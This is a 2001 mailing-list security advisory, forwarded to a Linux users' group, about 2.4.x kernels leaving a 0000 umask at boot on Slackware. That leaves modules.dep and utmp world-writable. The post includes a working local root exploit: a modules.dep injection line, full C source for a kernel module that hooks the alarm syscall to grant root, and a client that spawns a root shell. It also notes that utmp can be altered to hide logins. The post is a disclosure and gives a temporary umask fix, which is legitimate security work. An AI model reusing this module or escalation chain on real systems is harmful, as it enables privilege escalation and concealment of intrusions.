From: <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>
Sent: Monday, July 16, 2001 10:53 PM
Subject: 2.4.x/Slackware Init script vulnerability
> I posted this to the linux kernel mailing last
Friday, July 13th
2001:
>
> Submitted by : Josh ([EMAIL PROTECTED]),
lockdown
> ([EMAIL PROTECTED]) on July
16th, 2001
> Vulnerability : /lib/modules/2.4.5/modules.dep
> Tested On : Slackware 8.0. 2.4.5
> Local : Yes
> Remote : No
> Temporary Fix : umask 022 at the top of all your
startup scripts
> Target : root
> Big thanks to : slider, lamagra, zen-parse
> Greets to : alpha, fr3n3tic, omega, eazyass,
remmy, RedPen,
banned-it,
> cryptix, s0ttle, xphantom, qtip,
tirancy, Loki,
> falcon-networks.com.
>
> The 2.4.x kernels starting with 2.4.3 (i think)
have, after
> load, left a umask of 0000. This forces any files
created in the
bootup
> scripts, without the command `umask 022` issued to
be world
writeable.
> In slackware, files include /var/run/utmp and
/var/run/gpm.pid. This
same
> vulnerability is responsible for creating
/lib/modules/`uname -r`/modules.dep
> world writeable. With this file world writeable,
all an intruder
need do
is
> put something like the following in
/lib/modules/`uname
-r`/modules.dep
> assuming the system's startup scripts modprobe lp:
>
> /lib/modules/2.4.5/kernel/drivers/char/lp.o:
/tmp/alarm.o
>
> /tmp/alarm.o:
>
> where the alarm.o module is:
>
> #include <linux/config.h>
> #include <linux/module.h>
> #include <linux/version.h>
> #include <linux/types.h>
> #include <asm/segment.h>
> #include <asm/unistd.h>
> #include <linux/dirent.h>
> #include <sys/syscall.h>
> #include <sys/sysmacros.h>
>
> #include <linux/sched.h>
>
> #include <linux/errno.h>
> #include <linux/fs.h>
> #include <linux/kernel.h>
>
> extern void* sys_call_table[];
>
> unsigned int (*old_alarm) (unsigned int seconds);
> unsigned int hacked_alarm (unsigned int seconds);
>
> unsigned int hacked_alarm(unsigned int seconds)
> {
> if(seconds == 454) {
> current->uid = 0;
> current->euid = 0;
> current->gid = 0;
> current->egid = 0;
> return 0;
> }
> return old_alarm(seconds);
> }
>
> int init_module(void) {
> old_alarm=sys_call_table[SYS_alarm];
> sys_call_table[SYS_alarm] = hacked_alarm;
> return 0;
> }
>
> void cleanup_module(void) {
> sys_call_table[SYS_alarm] = old_alarm;
> }
>
> make a client:
> #include <stdio.h>
> #include <unistd.h>
>
> int main(void)
> {
> alarm(454);
> execl("/bin/sh", "sh", NULL);
> }
>
> which will, when the module is loaded, execute a
shell as root.
>
>
> And of course with /var/run/utmp writeable,
users can delete
or in
> other ways manipulate their logins as they appear in
> w/who/finger/getlogin(), etc.
__________________________________________________
Do You Yahoo!?
Get personalized email addresses from Yahoo! Mail
http://personal.mail.yahoo.com/
_
Philippine Linux Users Group. Web site and archives at http://plug.linux.org.ph
To leave: send "unsubscribe" in the body to [EMAIL PROTECTED]
To subscribe to the Linux Newbies' List: send "subscribe" in the body to
[EMAIL PROTECTED]
